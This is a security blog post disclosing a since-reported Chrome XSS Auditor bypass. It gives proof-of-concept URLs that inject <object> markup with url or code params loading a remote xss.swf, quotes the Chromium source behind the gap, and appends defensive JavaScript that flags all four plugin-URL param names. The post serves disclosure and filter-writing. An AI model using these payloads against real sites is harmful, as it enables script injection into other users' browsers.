I just found an XSS Auditor bypass by accident while reading Chromium's code for another reason.
In this short post, I'd like to share this bypass. I confirmed that it works on Chrome Canary 57.
I have already reported it here: https://bugs.chromium.org/p/chromium/issues/detail?id=676992
The bypass is:
https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E

    <object allowscriptaccess=always>
    <param name=url value=https://l0.cm/xss.swf>

This also works:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=code%20value=https://l0.cm/xss.swf%3E

    <object allowscriptaccess=always>
    <param name=code value=https://l0.cm/xss.swf>
I didn't know that Chrome supports such params until I found them in HTMLObjectElement.cpp:

    if (url.isEmpty() && urlParameter.isEmpty() &&
        (equalIgnoringCase(name, "src") || equalIgnoringCase(name, "movie") ||
         equalIgnoringCase(name, "code") || equalIgnoringCase(name, "url")))
      urlParameter = stripLeadingAndTrailingHTMLSpaces(p->value());

The <param name="src" value="//attacker/xss.swf"> and <param name="movie" value="//attacker/xss.swf"> are blocked by XSS Auditor. But I noticed that code and url are not blocked. Using this, we can load Flash and execute JavaScript. According to the source code's comment, it seems Chrome supports this for compatibility. But at least I confirmed it does not work on IE/Edge and Firefox. I think Chrome can remove this support :)

That's it. I wrote about an XSS Auditor bypass using <param>. Thanks for reading!
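The lesson for anyone writing an HTML filter or a detection rule is that the plugin URL of an <object> can arrive under four <param> names, not two. The following JavaScript is an added example, not code from this post and not Chromium's code: it mirrors the alias rule quoted above (src, movie, code, url compared case-insensitively, with leading and trailing HTML whitespace stripped) and compares a filter that knows only src/movie against one that knows all four names. The tag parsing is a deliberately small regex approximation of a real HTML parser, and the hostnames in the sample fragments are constructed placeholders.

```javascript
// Added example: an audit that recognises every <param> name Chromium treats
// as the plugin URL. Not Chromium's code; a regex-based approximation of
// HTML parsing for <object>/<param> fragments only.

// The four aliases from the quoted HTMLObjectElement.cpp logic.
const URL_PARAM_NAMES = ['src', 'movie', 'code', 'url'];

// HTML whitespace is space, tab, LF, FF and CR; this mirrors
// stripLeadingAndTrailingHTMLSpaces() from the quoted snippet.
function stripHtmlSpaces(s) {
  return s.replace(/^[ \t\n\f\r]+|[ \t\n\f\r]+$/g, '');
}

// Parse the attribute list of one tag: name="v", name='v', name=v or a bare
// name. Attribute names are lower-cased; the first occurrence of a name wins.
function parseAttributes(tagBody) {
  const attrs = {};
  const re = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    const name = m[1].toLowerCase();
    const value = m[2] !== undefined ? m[2]
      : m[3] !== undefined ? m[3]
      : m[4] !== undefined ? m[4] : '';
    if (!(name in attrs)) attrs[name] = value;
  }
  return attrs;
}

// Scan a fragment and report each <object> whose plugin URL is supplied by a
// <param> whose name is in knownNames. A <param> belongs to the most recent
// unclosed <object>; as in the quoted logic, the first matching param wins.
function auditObjectMarkup(html, knownNames = URL_PARAM_NAMES) {
  const objects = [];
  let current = null;
  const tagRe = /<(\/?)(object|param)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const closing = m[1] === '/';
    const tag = m[2].toLowerCase();
    if (tag === 'object') {
      if (closing) { current = null; continue; }
      current = { attrs: parseAttributes(m[3]), params: [] };
      objects.push(current);
    } else if (!closing && current !== null) {
      current.params.push(parseAttributes(m[3]));
    }
  }
  const lowered = knownNames.map((n) => n.toLowerCase());
  const findings = [];
  for (const obj of objects) {
    let urlParameter = '';
    let via = null;
    for (const p of obj.params) {
      const name = (p.name || '').toLowerCase();
      if (urlParameter === '' && lowered.includes(name)) {
        urlParameter = stripHtmlSpaces(p.value || '');
        via = name;
      }
    }
    if (urlParameter !== '') {
      findings.push({
        via,
        pluginUrl: urlParameter,
        allowScriptAccess: (obj.attrs.allowscriptaccess || '').toLowerCase(),
      });
    }
  }
  return findings;
}

// Constructed sample fragments; example.invalid is a placeholder host.
const SAMPLES = [
  '<object allowscriptaccess=always> <param name=url value=https://example.invalid/x.swf>',
  '<object allowscriptaccess=always> <param name=code value=https://example.invalid/x.swf>',
  '<object allowscriptaccess="always"><param name="SRC" value="  //example.invalid/x.swf  "></object>',
  '<object><param name="movie" value="//example.invalid/x.swf"></object>',
  '<object><param name="width" value="100"></object>',
];

// A filter that only knows src/movie, the gap described in the post.
function naiveFindings() {
  return SAMPLES.flatMap((s) => auditObjectMarkup(s, ['src', 'movie']));
}

// The same filter with all four aliases.
function fullFindings() {
  return SAMPLES.flatMap((s) => auditObjectMarkup(s));
}

console.log('src/movie only:', naiveFindings().length, 'findings');
console.log('all four names:', fullFindings().length, 'findings');
```

Over the five constructed fragments the src/movie-only filter reports two objects and the four-name filter reports four; the two it gains are exactly the url and code cases. The same alias list is the right starting point for a detection signature over captured HTML or WAF logs, and the whitespace stripping matters because Chromium strips it before using the value.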